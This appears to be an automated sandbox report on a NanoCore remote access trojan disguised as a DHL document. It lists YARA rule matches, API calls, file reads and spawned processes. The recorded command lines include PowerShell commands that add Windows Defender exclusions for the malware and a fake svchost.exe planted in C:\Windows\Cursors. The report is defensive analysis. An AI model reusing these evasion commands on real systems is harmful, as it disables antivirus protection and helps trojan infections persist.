Source: 0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.CasPol.exe.2dfb8c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.2.CasPol.exe.5370000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 29.2.CasPol.exe.5370000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmp	Binary or memory string: 0024000004800000940000000602000000240000525341310004000001000100B5FC90E7027F67871E773A8FDE8938C81DD402Bf:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
Source: DHL_document1102202068090891.exe, 00000000.00000002.518564099.00000000015F4000.00000004.00000020.sdmp	Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

Source: classification engine

Classification label: mal100.troj.evad.winEXE@44/21@5/5

Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Code function: 12_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,		12_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Code function: 14_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,		14_2_00408FC9

Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe

Code function: 12_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

12_2_004095FD

Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe

Code function: 12_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,

12_2_0040A33B

Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe

Code function: 12_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

12_2_00401306

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20210225

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{933bebd4-0378-4b22-a9fe-1200446be50c}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5308
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6400:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_01

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

File created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d

Jump to behavior

Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe

Source: DHL_document1102202068090891.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: DHL_document1102202068090891.exe	Virustotal: Detection: 28%
Source: DHL_document1102202068090891.exe	ReversingLabs: Detection: 32%

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

File read: C:\Users\user\Desktop\DHL_document1102202068090891.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL_document1102202068090891.exe 'C:\Users\user\Desktop\DHL_document1102202068090891.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /SpecialRun 4101d8 1864
Source: unknown	Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown	Process created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
